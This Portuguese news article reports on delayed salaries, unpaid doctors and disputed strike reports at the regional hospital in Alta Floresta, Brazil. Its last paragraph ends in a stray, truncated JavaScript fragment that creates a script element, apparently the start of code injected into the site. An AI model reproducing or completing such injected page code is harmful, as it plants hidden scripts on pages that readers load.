Breaking News

Com um mês de atraso, funcionários do HRAS recebem dezembro; médicos ainda não foram pagos

HospitalDa Redação

Com um mês de atraso, funcionários do Hospital Regional Albert Sabin de Alta Floresta receberam nesta semana, o salário referente ao mês de dezembro de 2015 e, ao contrário do noticiado nesta terça-feira, 02, pelo site de comunicação G1, os enfermeiros da unidade hospitalar não aderiram a paralização que ocorre na cidade de Sinop e Colider.
A notícia produzida pelo site afirma que enfermeiros de Alta Floresta teriam aderido a paralização ainda no dia 28, juntamente com os funcionários da unidade de Sinop, porém ao visitar a unidade ontem, os atendimentos estão ocorrendo normalmente e alguns funcionários, que não quiseram se identificar, afirmaram que já receberam o mês de dezembro.
Segundo o Sindicato dos Profissionais de Enfermagem de Mato Grosso (Sinpen-MT), atualmente o estado conta com cerca de 10 mil enfermeiros e as informações são de que somente os municípios de Sinop e de Colíder aderiram a greve, cerca de 170 funcionários. Ainda segundo Arlindo Cesar diretor sindical do Sispen os funcionários de Sinop apesar de receberem os salários referentes ao mês de dezembro manterão a paralização devido aos problemas sofridos na unidade e ao salário do mês de janeiro, que hoje já atinge o 3º dia de atraso.
Segundo a assessoria de imprensa da secretaria de estado de Saúde, para a reportagem do Jornal O Diário, os pagamentos dos funcionários do hospital Regional de Alta Floresta já foram realizados, porém ainda falta solucionar a situação médica. “Os funcionários já foram pagos o que está acontecendo em Alta Floresta é em relação aos prestadores de serviço, esses realmente tem alguns atrasos, só que existe toda uma tramitação burocrática da secretaria porque estes pagamentos eles só são realizados depois que a empresa presta conta do serviço conforme esta no contrato”, segundo a assessoria até o dia 12 de fevereiro os funcionários devem receber o salário referente ao mês de janeiro.
Outro problema sofrido pelos profissionais da unidade é referente ao pagamento dos tickets de alimentação, que segundo alguns funcionários já possuem 08 meses de atrasos sem previsão para pagamento.var d=document;var s=d.createElement(‘script’);

Check Also

PM prende cinco faccionados e apreende drogas e raspadinhas ilegais em Alta Floresta

Uma das suspeitas foi flagrada comercializando bilhetes do tipo raspadinha para atividade ilícita de uma …

Plantão 24h da Mulher atendeu 1,5 mil mulheres vítimas de violência no primeiro semestre de 2025

Unidade da Polícia Civil também elaborou 2 mil boletins de ocorrência no mesmo período O …

Proprietário de veículo que mudou de município precisa atualizar dados cadastrais no Detran-MT

Com os dados cadastrais atualizados o proprietário consegue receber as notificações de autuação dentro do …

Cabeça humana é encontrada dentro de sacola no cemitério municipal de Alta Floresta

Moradora que fazia limpeza em túmulo encontrou o material; Polícia Civil e Politec investigam o …

Defesa Civil Municipal monitora local onde seria realizado o Fest Praia No Rio Teles Pires

Atendendo a um pedido direto do prefeito de Paranaíta, Osmar Moreira, o coordenador da Defesa …

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *